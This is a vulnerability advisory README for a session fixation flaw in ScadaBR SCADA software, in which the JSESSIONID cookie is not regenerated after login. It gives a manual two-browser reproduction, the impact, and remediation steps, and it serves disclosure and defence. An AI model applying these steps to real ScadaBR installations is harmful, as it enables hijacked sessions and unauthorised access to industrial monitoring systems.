README.md

CVE-2025-70973: Session Fixation in ScadaBR (JSESSIONID Not Regenerated After Login)

Description

ScadaBR uses a Java/Tomcat HTTP session cookie (JSESSIONID) that is issued before authentication and is not regenerated after a user successfully logs in. Because the same pre-authentication session identifier becomes an authenticated session once a victim loggs in, an attacker who can obtain a victim’s JSESSIONID prior to login can reuse that session identifier from another browser/client to access authenticated resources.

This is a session fixation vulnerability (CWE-384).

Affected Product(s) / Version(s)

• ScadaBR 1.12.4(tested)
• ScadaBR 0.9 (default installation)
• ScadaBR 1.0CE (tested)
• ScadaBR Virtual Machine image referenced by OpenPLC documentation (tested)

Steps to Reproduce (PoC)

1. Open Browser A and visit:
   • http://<target>:<port>/ScadaBR/watch_list.shtm
   • You will be redirected to http://<target>:<port>/ScadaBR/login.htm
2. In Browser A, capture the pre-auth session cookie from developer tools/storage:
   • JSESSIONID=<valueA>
3. Open Browser B and visit:
   • http://<target>:<port>/ScadaBR/login.htm (or any page it will redirect to login)
4. In Browser B, overwrite its JSESSIONID cookie with the value from Browser A:
   • Set JSESSIONID=<valueA>
5. In Browser A, log in with valid credentials.
6. In Browser B (without logging in), request an authenticated page such as:
   • http://<target>:<port>/ScadaBR/watch_list.shtm
7. Observe that Browser B can access authenticated content while Browser A remains logged in.
8. Log out from Browser A and confirm Browser B access stops.

Impact

Successful exploitation allows an attacker to hijack an authenticated ScadaBR session if they can obtain the victim’s pre-authentication session ID. This can result in unauthorized access to SCADA monitoring pages and other authenticated functionality until logout or session expiration.

Mitigation / Remediation

• Regenerate the session identifier upon successful authentication (e.g., request.changeSessionId() or invalidate and recreate session after login).
• Ensure cookies are set with appropriate flags (HttpOnly, Secure with HTTPS, and SameSite where applicable).
• Enforce HTTPS to reduce risk of session theft on the network.

Credits

Discovered by Chiranjib Mohapatra, Raja Kulukuri, Divya Bridgit Tomy, Teja Sai Hanish Gudepu, Jan 2026.

References

• Upstream repository: https://github.com/ScadaBR/ScadaBR
• OpenPLC ScadaBR VM install reference: https://github.com/openplcproject/openplcproject.github.io/blob/master/reference/scadabr/index.md
• ScadaBR Manual (SourceForge): https://sourceforge.net/p/scadabr/wiki/Manual%20ScadaBR%20English%200%20Summary/